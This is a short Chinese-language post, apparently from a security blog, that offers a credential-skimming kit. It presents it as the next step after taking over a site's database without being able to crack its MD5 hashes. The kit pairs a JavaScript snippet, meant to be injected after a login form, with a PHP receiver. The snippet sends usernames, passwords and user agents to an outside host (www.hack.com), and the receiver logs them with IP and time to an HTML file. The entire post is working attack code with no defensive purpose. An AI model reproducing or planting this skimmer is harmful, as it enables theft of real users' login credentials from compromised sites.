一段截獲登錄表單的用戶名和密碼的Javascript腳本。
拿下了網站的數據庫卻破不了MD5的情況下,可以嘗試利用這段腳本截獲登錄表單的用戶名和密碼。
這段腳本需要調用到DOM,所以應把這段代碼插在登錄表單之後。
sniffer.js
/*
author: eT48
blog: http://blog.csdn.net/et48_sec
version: 1.0
*/
var http_server = "http://www.hack.com/sniffer.php";
document.getElementById("Login").οnclick=function(){sniffer()};
function sniffer()
{
var user = document.getElementById("username").value;
var pwd = document.getElementById("password").value;
var ua = navigator.userAgent;
var x = new Image();
x.src = http_server+"?user="+user+"&pwd="+pwd+"&ua="+ua;
}
sniffer.php
<?php
/*
author: eT48
blog: http://blog.csdn.net/et48_sec
version: 1.0
*/
@header("Content-Type:text/html;charset=utf-8");
$ip = $_SERVER['REMOTE_ADDR'];
$time = date("Y-m-d H:i:s");
$data = "";
$data .= ("IP: ".$ip."<br>Time: ".$time."<br>");
if(!empty($_GET['user'])){$data .= "user: "; $data .= $_GET['user']; $data.="<br>";}
if(!empty($_GET['pwd'])){$data .= "Password: "; $data .= $_GET['pwd']; $data.="<br>";}
if(!empty($_GET['ua'])){$data .= "User_Agent: "; $data .= $_GET['ua']; $data.="<br><br>";}
if(!file_exists("data.html")){
$fp = fopen("data.html", "a+");
fwrite($fp, '<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Sensitive Information</title><style>body{font-size:16px;}</style></head>');
fclose($fp);
}
$fp = fopen("data.html", "a+");
fwrite($fp, $data);
fclose($fp);
?>